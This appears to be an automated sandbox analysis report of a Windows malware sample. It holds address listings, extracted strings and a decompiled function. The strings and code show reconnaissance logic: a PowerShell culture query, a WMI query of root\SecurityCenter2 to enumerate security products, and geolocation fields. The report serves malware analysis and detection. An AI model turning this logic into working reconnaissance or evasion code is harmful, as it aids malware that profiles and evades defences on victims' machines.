                                                                                          0x7ff768b9ea99
                                                                                          0x7ff768b9ea9b
                                                                                          0x7ff768b9ea9f
                                                                                          0x7ff768b9eaab
                                                                                          0x7ff768b9eab0
                                                                                          0x7ff768b9eab7
                                                                                          0x7ff768b9eabe
                                                                                          0x7ff768b9eac5
                                                                                          0x7ff768b9eacc
                                                                                          0x7ff768b9ead6
                                                                                          0x7ff768b9eade
                                                                                          0x7ff768b9eae4
                                                                                          0x7ff768b9eae5
                                                                                          0x7ff768b9eaeb
                                                                                          0x7ff768b9eaf2
                                                                                          0x7ff768b9eaf9
                                                                                          0x7ff768b9eb00
                                                                                          0x7ff768b9eb07
                                                                                          0x7ff768b9eb0e
                                                                                          0x7ff768b9eb11
                                                                                          0x7ff768b9eb18
                                                                                          0x7ff768b9eb1c
                                                                                          0x7ff768b9eb1f
                                                                                          0x7ff768b9eb23
                                                                                          0x7ff768b9eb2b
                                                                                          0x7ff768b9eb33
                                                                                          0x7ff768b9eb37
                                                                                          0x7ff768b9eb41
                                                                                          0x7ff768b9eb49
                                                                                          0x7ff768b9eb5a
                                                                                          0x7ff768b9eb70
                                                                                          0x7ff768b9eb76
                                                                                          0x7ff768b9eb87
                                                                                          0x7ff768b9eb8d
                                                                                          0x7ff768b9eb93
                                                                                          0x7ff768b9eb9a
                                                                                          0x7ff768b9eba1
                                                                                          0x7ff768b9eba7
                                                                                          0x7ff768b9ebac
                                                                                          0x7ff768b9ebb3
                                                                                          0x7ff768b9ebbb
                                                                                          0x7ff768b9ebc3
                                                                                          0x7ff768b9ebca
                                                                                          0x7ff768b9ebd1
                                                                                          0x7ff768b9ebdb
                                                                                          0x7ff768b9ebe4
                                                                                          0x7ff768b9ebe7
                                                                                          0x7ff768b9ebf9
                                                                                          0x7ff768b9ebfd
                                                                                          0x7ff768b9ec03
                                                                                          0x7ff768b9ec07
                                                                                          0x7ff768b9ec0d
                                                                                          0x7ff768b9ec22
                                                                                          0x7ff768b9ec30
                                                                                          0x7ff768b9ec3c
                                                                                          0x7ff768b9ec49
                                                                                          0x7ff768b9ec50
                                                                                          0x7ff768b9ec5f
                                                                                          0x7ff768b9ec71
                                                                                          0x7ff768b9ec7a
                                                                                          0x7ff768b9ec86
                                                                                          0x7ff768b9ec8e
                                                                                          0x7ff768b9ec97
                                                                                          0x7ff768b9eca4
                                                                                          0x7ff768b9ecac
                                                                                          0x7ff768b9ecb2
                                                                                          0x7ff768b9ecb5
                                                                                          0x7ff768b9ecbf
                                                                                          0x7ff768b9ecc3
                                                                                          0x7ff768b9ecca
                                                                                          0x7ff768b9ecd2
                                                                                          0x7ff768b9ece0
                                                                                          0x7ff768b9ece6
                                                                                          0x7ff768b9ecec
                                                                                          0x7ff768b9ecf3
                                                                                          0x7ff768b9ed0b
                                                                                          0x7ff768b9ed1b
                                                                                          0x7ff768b9ed21
                                                                                          0x7ff768b9ed27
                                                                                          0x7ff768b9ed2e
                                                                                          0x7ff768b9ed35
                                                                                          0x7ff768b9ed3f
                                                                                          0x7ff768b9ed51
                                                                                          0x7ff768b9ed57
                                                                                          0x7ff768b9ed5d
                                                                                          0x7ff768b9ed64
                                                                                          0x7ff768b9ed6f
                                                                                          0x7ff768b9ed77
                                                                                          0x7ff768b9ed7d
                                                                                          0x7ff768b9ed84
                                                                                          0x7ff768b9ed92
                                                                                          0x7ff768b9ed95
                                                                                          0x7ff768b9ed98
                                                                                          0x7ff768b9ed9c
                                                                                          0x7ff768b9eda0
                                                                                          0x7ff768b9eda6
                                                                                          0x7ff768b9edaa
                                                                                          0x7ff768b9edb2
                                                                                          0x7ff768b9edbd
                                                                                          0x7ff768b9edc1
                                                                                          0x7ff768b9edca
                                                                                          0x7ff768b9edd3
                                                                                          0x7ff768b9ede1
                                                                                          0x7ff768b9ede8
                                                                                          0x7ff768b9edec
                                                                                          0x7ff768b9edf7
                                                                                          0x7ff768b9ee0f
                                                                                          0x7ff768b9ee16
                                                                                          0x7ff768b9ee1d
                                                                                          0x7ff768b9ee3b
                                                                                          0x7ff768b9ee40
                                                                                          0x7ff768b9ee47
                                                                                          0x7ff768b9ee50
                                                                                          0x7ff768b9ee5e
                                                                                          0x7ff768b9ee61
                                                                                          0x7ff768b9ee64
                                                                                          0x7ff768b9ee69
                                                                                          0x7ff768b9ee75
                                                                                          0x7ff768b9ee7c
                                                                                          0x7ff768b9ee7e
                                                                                          0x7ff768b9ee87
                                                                                          0x7ff768b9ee8b
                                                                                          0x7ff768b9ee8f
                                                                                          0x7ff768b9ee93
                                                                                          0x7ff768b9ee98
                                                                                          0x7ff768b9eea1
                                                                                          0x7ff768b9eeac
                                                                                          0x7ff768b9eecb
                                                                                          0x7ff768b9eed9
                                                                                          0x7ff768b9eee6
                                                                                          0x7ff768b9eee6
                                                                                          0x7ff768b9eeed
                                                                                          0x7ff768b9eef0
                                                                                          0x7ff768b9eef7
                                                                                          0x7ff768b9ef11
                                                                                          0x7ff768b9ef20
                                                                                          0x7ff768b9ef27
                                                                                          0x7ff768b9ef2d
                                                                                          0x7ff768b9ef34
                                                                                          0x7ff768b9ef3e
                                                                                          0x7ff768b9ef3e
                                                                                          0x7ff768b9ef45
                                                                                          0x7ff768b9ef48
                                                                                          0x7ff768b9ef4c
                                                                                          0x7ff768b9ef53
                                                                                          0x7ff768b9ef5e
                                                                                          0x7ff768b9ef62
                                                                                          0x7ff768b9ef66
                                                                                          0x7ff768b9ef6a
                                                                                          0x7ff768b9ef6a
                                                                                          0x7ff768b9ef71
                                                                                          0x7ff768b9ef7f
                                                                                          0x7ff768b9ef88
                                                                                          0x7ff768b9ef8c
                                                                                          0x7ff768b9ef8c
                                                                                          0x7ff768b9ef90
                                                                                          0x7ff768b9ef94
                                                                                          0x7ff768b9ef98
                                                                                          0x7ff768b9efa2
                                                                                          0x7ff768b9efb6
                                                                                          0x7ff768b9efbb
                                                                                          0x7ff768b9efd3
                                                                                          0x7ff768b9efd8
                                                                                          0x7ff768b9efdf
                                                                                          0x7ff768b9efe3
                                                                                          0x7ff768b9efee
                                                                                          0x7ff768b9f006
                                                                                          0x7ff768b9f014
                                                                                          0x7ff768b9f02e
                                                                                          0x7ff768b9f047
                                                                                          0x7ff768b9f051
                                                                                          0x7ff768b9f058
                                                                                          0x7ff768b9f058
                                                                                          0x7ff768b9f05f
                                                                                          0x7ff768b9f066
                                                                                          0x7ff768b9f080
                                                                                          0x7ff768b9f088
                                                                                          0x7ff768b9f08f
                                                                                          0x7ff768b9f095
                                                                                          0x7ff768b9f09c
                                                                                          0x7ff768b9f0a6
                                                                                          0x7ff768b9f0ad
                                                                                          0x7ff768b9f0b4
                                                                                          0x7ff768b9f0bb
                                                                                          0x7ff768b9f0c6
                                                                                          0x7ff768b9f0ca
                                                                                          0x7ff768b9f0ce
                                                                                          0x7ff768b9f0d2
                                                                                          0x7ff768b9f0d2
                                                                                          0x7ff768b9f0d9
                                                                                          0x7ff768b9f0e7
                                                                                          0x7ff768b9f0f0
                                                                                          0x7ff768b9f0f4
                                                                                          0x7ff768b9f0f8
                                                                                          0x7ff768b9f0fc
                                                                                          0x7ff768b9f106
                                                                                          0x7ff768b9f113
                                                                                          0x7ff768b9f118
                                                                                          0x7ff768b9f130
                                                                                          0x7ff768b9f135
                                                                                          0x7ff768b9f13c
                                                                                          0x7ff768b9f140
                                                                                          0x7ff768b9f14b
                                                                                          0x7ff768b9f163
                                                                                          0x7ff768b9f171
                                                                                          0x7ff768b9f17d
                                                                                          0x7ff768b9f183
                                                                                          0x7ff768b9f183
                                                                                          0x7ff768b9f18a
                                                                                          0x7ff768b9f191
                                                                                          0x7ff768b9f1ab
                                                                                          0x7ff768b9f1b3
                                                                                          0x7ff768b9f1ba
                                                                                          0x7ff768b9f1c0
                                                                                          0x7ff768b9f1c7
                                                                                          0x7ff768b9f1d1
                                                                                          0x7ff768b9f1d8
                                                                                          0x7ff768b9f1df
                                                                                          0x7ff768b9f1e6
                                                                                          0x7ff768b9f1f1
                                                                                          0x7ff768b9f1f5
                                                                                          0x7ff768b9f1f9
                                                                                          0x7ff768b9f1fd
                                                                                          0x7ff768b9f1fd
                                                                                          0x7ff768b9f204
                                                                                          0x7ff768b9f212
                                                                                          0x7ff768b9f21b
                                                                                          0x7ff768b9f21f
                                                                                          0x7ff768b9f223
                                                                                          0x7ff768b9f227
                                                                                          0x7ff768b9f231
                                                                                          0x7ff768b9f23e
                                                                                          0x7ff768b9f243
                                                                                          0x7ff768b9f25b
                                                                                          0x7ff768b9f260
                                                                                          0x7ff768b9f267
                                                                                          0x7ff768b9f26b
                                                                                          0x7ff768b9f276
                                                                                          0x7ff768b9f28e
                                                                                          0x7ff768b9f29c
                                                                                          0x7ff768b9f2b4
                                                                                          0x7ff768b9f2ba
                                                                                          0x7ff768b9f2c1
                                                                                          0x7ff768b9f2c1
                                                                                          0x7ff768b9f2c8
                                                                                          0x7ff768b9f2cf
                                                                                          0x7ff768b9f2e9
                                                                                          0x7ff768b9f2f1
                                                                                          0x7ff768b9f2f8
                                                                                          0x7ff768b9f2fe
                                                                                          0x7ff768b9f305
                                                                                          0x7ff768b9f30f
                                                                                          0x7ff768b9f316
                                                                                          0x7ff768b9f31d
                                                                                          0x7ff768b9f324
                                                                                          0x7ff768b9f32f
                                                                                          0x7ff768b9f333
                                                                                          0x7ff768b9f337
                                                                                          0x7ff768b9f33b
                                                                                          0x7ff768b9f33b
                                                                                          0x7ff768b9f342
                                                                                          0x7ff768b9f350
                                                                                          0x7ff768b9f359
                                                                                          0x7ff768b9f35d
                                                                                          0x7ff768b9f361
                                                                                          0x7ff768b9f365
                                                                                          0x7ff768b9f36f
                                                                                          0x7ff768b9f37c
                                                                                          0x7ff768b9f381
                                                                                          0x7ff768b9f399
                                                                                          0x7ff768b9f39e
                                                                                          0x7ff768b9f3a5
                                                                                          0x7ff768b9f3a9
                                                                                          0x7ff768b9f3b4
                                                                                          0x7ff768b9f3cc
                                                                                          0x7ff768b9f3da
                                                                                          0x7ff768b9f3eb
                                                                                          0x7ff768b9f3ee
                                                                                          0x7ff768b9f3ee
                                                                                          0x7ff768b9f3f5
                                                                                          0x7ff768b9f3f8
                                                                                          0x7ff768b9f3fb
                                                                                          0x7ff768b9f402
                                                                                          0x7ff768b9f41c
                                                                                          0x7ff768b9f424
                                                                                          0x7ff768b9f437
                                                                                          0x7ff768b9f43f
                                                                                          0x7ff768b9f446
                                                                                          0x7ff768b9f44c
                                                                                          0x7ff768b9f453
                                                                                          0x7ff768b9f459
                                                                                          0x7ff768b9f45d
                                                                                          0x7ff768b9f464
                                                                                          0x7ff768b9f47a
                                                                                          0x7ff768b9f482
                                                                                          0x7ff768b9f495
                                                                                          0x7ff768b9f49d
                                                                                          0x7ff768b9f4a4
                                                                                          0x7ff768b9f4b1
                                                                                          0x7ff768b9f4b6
                                                                                          0x7ff768b9f4c0
                                                                                          0x7ff768b9f4c2
                                                                                          0x7ff768b9f4c9
                                                                                          0x7ff768b9f4cf
                                                                                          0x7ff768b9f4d6
                                                                                          0x7ff768b9f4dd
                                                                                          0x7ff768b9f4e8
                                                                                          0x7ff768b9f4ec
                                                                                          0x7ff768b9f4f0
                                                                                          0x7ff768b9f4f4
                                                                                          0x7ff768b9f4fb
                                                                                          0x7ff768b9f506
                                                                                          0x7ff768b9f50a
                                                                                          0x7ff768b9f50a
                                                                                          0x7ff768b9f511
                                                                                          0x7ff768b9f51f
                                                                                          0x7ff768b9f528
                                                                                          0x7ff768b9f52c
                                                                                          0x7ff768b9f530
                                                                                          0x7ff768b9f534
                                                                                          0x7ff768b9f53e
                                                                                          0x7ff768b9f54b
                                                                                          0x7ff768b9f550
                                                                                          0x7ff768b9f568
                                                                                          0x7ff768b9f56d
                                                                                          0x7ff768b9f574
                                                                                          0x7ff768b9f578
                                                                                          0x7ff768b9f583
                                                                                          0x7ff768b9f59b
                                                                                          0x7ff768b9f5a9
                                                                                          0x7ff768b9f5bb
                                                                                          0x7ff768b9f5c2
                                                                                          0x7ff768b9f5c2
                                                                                          0x7ff768b9f5c9
                                                                                          0x7ff768b9f5d0
                                                                                          0x7ff768b9f5ea
                                                                                          0x7ff768b9f5f2
                                                                                          0x7ff768b9f605
                                                                                          0x7ff768b9f60d
                                                                                          0x7ff768b9f614
                                                                                          0x7ff768b9f61a
                                                                                          0x7ff768b9f621
                                                                                          0x7ff768b9f62b
                                                                                          0x7ff768b9f632
                                                                                          0x7ff768b9f639
                                                                                          0x7ff768b9f640
                                                                                          0x7ff768b9f64b
                                                                                          0x7ff768b9f64f
                                                                                          0x7ff768b9f653
                                                                                          0x7ff768b9f657
                                                                                          0x7ff768b9f657
                                                                                          0x7ff768b9f65e
                                                                                          0x7ff768b9f66c
                                                                                          0x7ff768b9f675
                                                                                          0x7ff768b9f679
                                                                                          0x7ff768b9f67d
                                                                                          0x7ff768b9f681
                                                                                          0x7ff768b9f68b
                                                                                          0x7ff768b9f690
                                                                                          0x7ff768b9f69f
                                                                                          0x7ff768b9f6a8
                                                                                          0x7ff768b9f6c0
                                                                                          0x7ff768b9f6c5
                                                                                          0x7ff768b9f6cc
                                                                                          0x7ff768b9f6d0
                                                                                          0x7ff768b9f6db
                                                                                          0x7ff768b9f6f3
                                                                                          0x7ff768b9f701

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -NoProfile-NonInteractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName$NL$$\\?\library\std\src\sys\windows\path.rs$a Display implementation returned an error unexpectedly/rustc/d5a82bbd26e1ad8b7401f6a718a9c57c96905483\library\alloc\src\string.rs$asn$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$city$connectioncdn-cache-controlcache-statuscache-controlauthorizationalt-svcallowageaccess-control-request-methodaccess-control-request-headersaccess-control-max-ageaccess-control-expose-headersaccess-control-allow-originaccess-control-allow-methodsaccess-control-$country$failed to write whole buffer$hell.exe$isp$nown$postal$powershe$riting$root\SecurityCenter2$timezoneutc
                                                                                          • API String ID: 0-2572153828
                                                                                          • Opcode ID: c14fa60963a9fc1796d8b5ed41c96e38b9574e6df474faee8cde4b9b6f8c9d80
                                                                                          • Instruction ID: ae5af9050b5f3d86f6ad0a3675741d1d8bb6091aef5fd8d557be8554a524c2d9
                                                                                          • Opcode Fuzzy Hash: c14fa60963a9fc1796d8b5ed41c96e38b9574e6df474faee8cde4b9b6f8c9d80
                                                                                          • Instruction Fuzzy Hash: 9C935A72604BC1C9EB20DF25E8543E9B7A4FB48B88F848136DA8D4BB59EF38D255C354
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768BA1FC3 Relevance: 58.0, APIs: 23, Strings: 9, Instructions: 2032memoryCOMMONCrypto
                                                                                          Download Yara Rule
                                                                                          C-Code - Quality: 57%
                                                                                          			E00007FF77FF768BA1FC3(signed int __ebx, void* __edx, void* __rdi, void* __rsi, signed long long __r8, void* __r9, signed int __r11, signed int __r14) {
				void* _t141;
				void* _t144;
				int _t150;
				void* _t162;
				signed int _t166;
				void* _t180;
				intOrPtr _t197;
				long long _t198;
				long long _t200;
				void* _t203;
				char* _t205;
				long long _t210;
				signed long long _t213;
				void* _t214;
				signed long long _t241;
				signed long long _t244;
				signed long long _t248;
				signed long long _t262;
				signed long long _t264;
				long long _t270;
				long long _t278;
				signed long long _t281;
				char* _t291;
				signed long long _t294;
				signed long long _t295;
				char* _t298;
				signed long long _t302;
				void* _t303;
				intOrPtr* _t306;
				void* _t307;
				signed long long _t308;
				void* _t315;
				long long _t322;
				long long _t327;
				signed long long _t329;

				_t315 = __r9;
				_t308 = __r8;
				_t162 = __edx;
				 *((intOrPtr*)(_t307 + 0x1e60)) = 0;
				FreeSid(??);
				 *((char*)(_t307 + 0x2510)) = __ebx & 0xffffff00 |  *((intOrPtr*)(_t307 + 0x1e60)) != 0x00000000;
				_t6 = _t307 + 0x2570; // -4397736555525017864
				 *(_t307 + 0x22a0) = _t6;
				 *((long long*)(_t307 + 0x22a8)) = 0x68befcb0;
				_t9 = _t307 + 0x2510; // -4397736555525017960
				 *((long long*)(_t307 + 0x22b0)) = _t9;
				 *((long long*)(_t307 + 0x22b8)) = 0x68bbd460;
				_t12 = _t307 + 0x10; // -4397736555525027432
				_t213 = _t12;
				 *_t213 = 0;
				 *((long long*)(_t213 + 0x10)) = 0x68e2d3e8;
				 *((long long*)(_t213 + 0x18)) = 0x68e2d3e8;
				 *((long long*)(_t213 + 0x20)) = __r14;
				 *((long long*)(_t213 + 0x28)) = 0x68e2d3e8;
				_t17 = _t307 + 0x1e60; // -4397736555525019672
				E00007FF77FF768BB09E0(_t17, _t213);
				if (__rsi !=  *((intOrPtr*)(_t307 + 0x1d50))) goto 0x68ba2076;
				_t281 = _t307 + 0x1d50;
				E00007FF77FF768C51B93(__rsi -  *((intOrPtr*)(_t307 + 0x1d50)), _t281, __rsi, _t308);
				_t329 =  *((intOrPtr*)(_t281 + 8));
				_t294 =  *((intOrPtr*)(_t281 + 0x10));
				 *((long long*)(_t329 + 0x10 + (_t294 + _t294 * 2) * 8)) =  *((intOrPtr*)(_t307 + 0x1e70));
				asm("movups xmm0, [ebp+0x1e60]");
				asm("inc ecx");
				_t295 = _t294 + 1;
				 *(_t307 + 0x1d60) = _t295;
				 *((long long*)(_t307 + 0x10)) = 0x68dbfb80;
				 *((long long*)(_t307 + 0x10)) = 0x10c81952;
				E00007FF77FF768B7CCEB(_t162,  *((intOrPtr*)(_t307 + 0x10)),  *((intOrPtr*)(_t307 + 0x10)));
				asm("xorps xmm0, xmm0");
				asm("movaps [ebp+0x10], xmm0");
				r9b = 1;
				r8d =  *(_t213 + 0x68dc4238) & 0x000000ff;
				_t166 =  *((_t213 | 0x00000001) + 0x68dc4238) & 0x000000ff;
				r11d =  *((_t213 | 0x00000002) + 0x68dc4238) & 0x000000ff;
				r14d =  *((_t213 | 0x00000003) + 0x68dc4238) & 0x000000ff;
				r15d =  *((_t213 | 0x00000004) + 0x68dc4238) & 0x000000ff;
				_t262 = (_t213 | 0x00000007) << 0x38;
				 *(_t307 + _t213 + 0x10) = (_t281 << 0x00000008 | _t308 | __r11 << 0x00000010 | __r14 << 0x00000018 | _t329 << 0x00000020 | _t295 << 0x00000028 | (_t213 | 0x00000006) << 0x00000030 | _t262) ^  *(0x10c81952 + _t213);
				r9d = 0;
				if ((r9b & 0x00000001) != 0) goto 0x68ba20d5;
				 *(_t307 + 0x20) =  *0x41027D3310C81962 & 0x0000ffff ^ 0x0000038c;
				E00007FF77FF768BEFD87(0x10c81952, (_t213 | 0x00000006) << 0x00000030 | _t262);
				 *((short*)(_t262 + 0x10)) =  *(_t307 + 0x20) & 0x0000ffff;
				asm("movdqa xmm0, [ebp+0x10]");
				asm("movdqu [edx], xmm0");
				if ( *(_t307 + 0x1d60) !=  *((intOrPtr*)(_t307 + 0x1d50))) goto 0x68ba21ce;
				_t214 = _t307 + 0x1d50;
				_t141 = E00007FF77FF768C51B93( *(_t307 + 0x1d60) -  *((intOrPtr*)(_t307 + 0x1d50)), _t214,  *(_t307 + 0x1d60), _t308);
				_t264 =  *((intOrPtr*)(_t214 + 0x10));
				_t197 =  *((intOrPtr*)(_t307 + 0x1d58));
				_t241 = _t264 + _t264 * 2;
				 *((long long*)(_t197 + _t241 * 8)) = 0x10c81952;
				 *(_t197 + 8 + _t241 * 8) = _t262;
				 *((long long*)(_t197 + 0x10 + _t241 * 8)) = 0x12;
				 *(_t307 + 0x1d60) = _t264 + 1;
				_t67 = _t307 + 0x22a0; // -4397736555525018584
				_t298 = _t67;
				r8d = 0x14;
				E00007FF77FF768C95BA2(_t141, 0x12, _t298, "root\\SecurityCenter2", _t308); // executed
				if ( *_t298 != 0x14) goto 0x68bac4b5;
				_t68 = _t307 + 0x22a0; // -4397736555525018584
				_t291 = _t68;
				_t198 =  *((intOrPtr*)(_t291 + 8));
				_t70 = _t307 + 0x2290; // -4397736555525018600
				 *_t70 = _t198;
				 *((long long*)(_t307 + 0x2110)) = _t198;
				 *((long long*)(_t307 + 0x2118)) = 1;
				 *((long long*)(_t307 + 0x2120)) = _t198;
				r9d = 0x28;
				_t144 = E00007FF77FF768B75A3C(_t198, _t291, _t70, 0x68dc4278, _t315);
				if ( *_t291 != 0x14) goto 0x68bac4ea;
				_t322 =  *((intOrPtr*)(_t307 + 0x22b0));
				_t244 =  *((intOrPtr*)(_t307 + 0x22b8));
				_t270 = (_t244 + _t244 * 2 << 4) + _t322;
				 *((long long*)(_t307 + 0x1e60)) =  *((intOrPtr*)(_t307 + 0x22a8));
				 *((long long*)(_t307 + 0x2780)) = _t270;
				 *((long long*)(_t307 + 0x1e70)) = _t270;
				 *((long long*)(_t307 + 0x1e78)) = _t322;
				if (_t244 == 0) goto 0x68ba24c5;
				asm("pcmpeqd xmm6, xmm6");
				_t200 = _t322;
				_t327 =  *((intOrPtr*)(_t200 + 0x18));
				if (_t327 == 0) goto 0x68ba24b0;
				 *((long long*)(_t307 + 0x22b0)) =  *((intOrPtr*)(_t200 + 0x10));
				asm("movups xmm0, [eax]");
				asm("movaps [ebp+0x22a0], xmm0");
				 *((long long*)(_t307 + 0x22b8)) = _t327;
				asm("movdqu xmm0, [eax+0x20]");
				asm("movdqu [eax], xmm0");
				if ( *((long long*)(_t307 + 0x22b0)) == 0) goto 0x68ba2490;
				r9d = 0xb;
				E00007FF77FF768C27AA3(_t144,  *(_t307 + 0x22c0),  *((intOrPtr*)(_t307 + 0x22c8)), 0x68dc42b8, _t315);
				asm("movd xmm0, eax");
				asm("punpcklbw xmm0, xmm0");
				asm("pshuflw xmm0, xmm0, 0x0");
				asm("pshufd xmm0, xmm0, 0x0");
				_t203 = _t327 - 0x38;
				r8d = 0;
				asm("repe inc ecx");
				asm("movdqa xmm2, xmm1");
				asm("pcmpeqb xmm2, xmm0");
				asm("pmovmskb edi, xmm2");
				if (_t166 == 0) goto 0x68ba23b9;
				asm("bsf si, di");
				_t93 = _t291 - 1; // 0x656d614e79616c6f
				_t302 =  ~(_t298 + ( *(_t307 + 0x22a0) & _t307 + 0x000022c0) &  *(_t307 + 0x22a0)) * 0x38;
				_t180 =  *((long long*)(_t203 + _t302 + 0x10)) - 0xb;
				if (_t180 != 0) goto 0x68ba2376;
				_t303 = _t302 + _t203;
				_t248 =  *( *(_t303 + 8)) ^ 0x70736964;
				if (_t180 != 0) goto 0x68ba2376;
				goto 0x68ba23d9;
				asm("pcmpeqb xmm1, xmm6");
				asm("pmovmskb edi, xmm1");
				if ((_t93 & _t166) != 0) goto 0x68ba2490;
				goto 0x68ba2364;
				_t205 =  ==  ? _t303 : _t303 + 0x18;
				if (_t303 == 0) goto 0x68ba2490;
				if ( *_t205 != 2) goto 0x68ba2490;
				 *((long long*)(_t307 + 0x20e0)) = _t205 + 8;
				 *((long long*)(_t307 + 0x2510)) = _t307 + 0x20e0;
				 *((long long*)(_t307 + 0x2518)) = 0x68c95902;
				 *((long long*)(_t307 + 0x10)) = 0;
				 *(_t307 + 0x20) = 0x68dc40d8;
				 *(_t307 + 0x28) = _t248;
				_t210 = _t307 + 0x2510;
				 *((long long*)(_t307 + 0x30)) = _t210;
				 *(_t307 + 0x38) = _t248;
				E00007FF77FF768BB09E0(_t307 + 0x2570, _t307 + 0x10);
				_t278 =  *((intOrPtr*)(_t307 + 0x2578));
				E00007FF77FF768BF799F(_t307 + 0x2110, _t278,  *((intOrPtr*)(_t307 + 0x2580)));
				if ( *((intOrPtr*)(_t307 + 0x2570)) == 0) goto 0x68ba2490;
				HeapFree(??, ??, ??);
				0x68b777f0();
				if (_t322 + 0x30 !=  *((intOrPtr*)(_t307 + 0x2780))) goto 0x68ba22cc;
				_t121 = _t307 + 0x1e60; // -4397736555525019672
				 *((long long*)(_t121 + 8)) =  *((intOrPtr*)(_t307 + 0x2780));
				E00007FF77FF768B77CD5();
				if ( *((long long*)(_t307 + 0x2120)) != 0) goto 0x68ba2539;
				E00007FF77FF768BEFD87(_t210, _t121);
				 *_t278 = 0x6e6b6e55;
				 *((intOrPtr*)(_t278 + 3)) = 0x6e776f6e;
				if ( *((long long*)(_t307 + 0x2110)) == 0) goto 0x68ba2520;
				_t150 = HeapFree(??, ??, ??);
				 *((long long*)(_t307 + 0x2110)) = _t210;
				 *((long long*)(_t307 + 0x2118)) = _t278;
				 *((long long*)(_t307 + 0x2120)) = 7;
				_t131 = _t307 + 0x10; // -4397736555525027432
				_t306 = _t131;
				 *_t306 = 0x68dc1cc9;
				 *_t306 = 0xc0aa94b7;
				E00007FF77FF768B7DB30(_t150, 0,  *_t306,  *_t306);
			}






































                                                                                          0x7ff768ba1fc3
                                                                                          0x7ff768ba1fc3
                                                                                          0x7ff768ba1fc3
                                                                                          0x7ff768ba1fc3
                                                                                          0x7ff768ba1fd0
                                                                                          0x7ff768ba1fdf
                                                                                          0x7ff768ba1fe5
                                                                                          0x7ff768ba1fec
                                                                                          0x7ff768ba1ffa
                                                                                          0x7ff768ba2001
                                                                                          0x7ff768ba2008
                                                                                          0x7ff768ba2016
                                                                                          0x7ff768ba201d
                                                                                          0x7ff768ba201d
                                                                                          0x7ff768ba2021
                                                                                          0x7ff768ba202f
                                                                                          0x7ff768ba2038
                                                                                          0x7ff768ba203c
                                                                                          0x7ff768ba2040
                                                                                          0x7ff768ba2044
                                                                                          0x7ff768ba204e
                                                                                          0x7ff768ba205a
                                                                                          0x7ff768ba205c
                                                                                          0x7ff768ba2069
                                                                                          0x7ff768ba206e
                                                                                          0x7ff768ba2072
                                                                                          0x7ff768ba2081
                                                                                          0x7ff768ba2086
                                                                                          0x7ff768ba208d
                                                                                          0x7ff768ba2092
                                                                                          0x7ff768ba2095
                                                                                          0x7ff768ba20a3
                                                                                          0x7ff768ba20b5
                                                                                          0x7ff768ba20bd
                                                                                          0x7ff768ba20c2
                                                                                          0x7ff768ba20c5
                                                                                          0x7ff768ba20c9
                                                                                          0x7ff768ba20d5
                                                                                          0x7ff768ba20e1
                                                                                          0x7ff768ba20ed
                                                                                          0x7ff768ba20f9
                                                                                          0x7ff768ba2105
                                                                                          0x7ff768ba212e
                                                                                          0x7ff768ba2163
                                                                                          0x7ff768ba2171
                                                                                          0x7ff768ba2177
                                                                                          0x7ff768ba2186
                                                                                          0x7ff768ba218f
                                                                                          0x7ff768ba219e
                                                                                          0x7ff768ba21a2
                                                                                          0x7ff768ba21a7
                                                                                          0x7ff768ba21b9
                                                                                          0x7ff768ba21bb
                                                                                          0x7ff768ba21c5
                                                                                          0x7ff768ba21ca
                                                                                          0x7ff768ba21d5
                                                                                          0x7ff768ba21dc
                                                                                          0x7ff768ba21e0
                                                                                          0x7ff768ba21e4
                                                                                          0x7ff768ba21e9
                                                                                          0x7ff768ba21f5
                                                                                          0x7ff768ba2203
                                                                                          0x7ff768ba2203
                                                                                          0x7ff768ba220a
                                                                                          0x7ff768ba2213
                                                                                          0x7ff768ba221b
                                                                                          0x7ff768ba2221
                                                                                          0x7ff768ba2221
                                                                                          0x7ff768ba2228
                                                                                          0x7ff768ba222c
                                                                                          0x7ff768ba2233
                                                                                          0x7ff768ba2238
                                                                                          0x7ff768ba223f
                                                                                          0x7ff768ba224a
                                                                                          0x7ff768ba2258
                                                                                          0x7ff768ba2261
                                                                                          0x7ff768ba2269
                                                                                          0x7ff768ba2276
                                                                                          0x7ff768ba227d
                                                                                          0x7ff768ba228c
                                                                                          0x7ff768ba228f
                                                                                          0x7ff768ba2296
                                                                                          0x7ff768ba229d
                                                                                          0x7ff768ba22a4
                                                                                          0x7ff768ba22ae
                                                                                          0x7ff768ba22b4
                                                                                          0x7ff768ba22cc
                                                                                          0x7ff768ba22d3
                                                                                          0x7ff768ba22da
                                                                                          0x7ff768ba22e4
                                                                                          0x7ff768ba22eb
                                                                                          0x7ff768ba22ee
                                                                                          0x7ff768ba22f5
                                                                                          0x7ff768ba22fc
                                                                                          0x7ff768ba2308
                                                                                          0x7ff768ba2314
                                                                                          0x7ff768ba2328
                                                                                          0x7ff768ba2335
                                                                                          0x7ff768ba234b
                                                                                          0x7ff768ba234f
                                                                                          0x7ff768ba2353
                                                                                          0x7ff768ba2358
                                                                                          0x7ff768ba235d
                                                                                          0x7ff768ba2361
                                                                                          0x7ff768ba2364
                                                                                          0x7ff768ba236a
                                                                                          0x7ff768ba236e
                                                                                          0x7ff768ba2372
                                                                                          0x7ff768ba2379
                                                                                          0x7ff768ba237b
                                                                                          0x7ff768ba2382
                                                                                          0x7ff768ba2392
                                                                                          0x7ff768ba2396
                                                                                          0x7ff768ba239c
                                                                                          0x7ff768ba239e
                                                                                          0x7ff768ba23a8
                                                                                          0x7ff768ba23b5
                                                                                          0x7ff768ba23b7
                                                                                          0x7ff768ba23b9
                                                                                          0x7ff768ba23bd
                                                                                          0x7ff768ba23c3
                                                                                          0x7ff768ba23d7
                                                                                          0x7ff768ba23e0
                                                                                          0x7ff768ba23e4
